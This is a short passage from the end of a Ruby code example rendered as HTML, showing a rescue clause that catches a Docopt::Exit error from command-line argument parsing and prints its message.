http)<br />rescue Docopt::Exit => e<br /> puts e.message<br />end<br /></code></pre>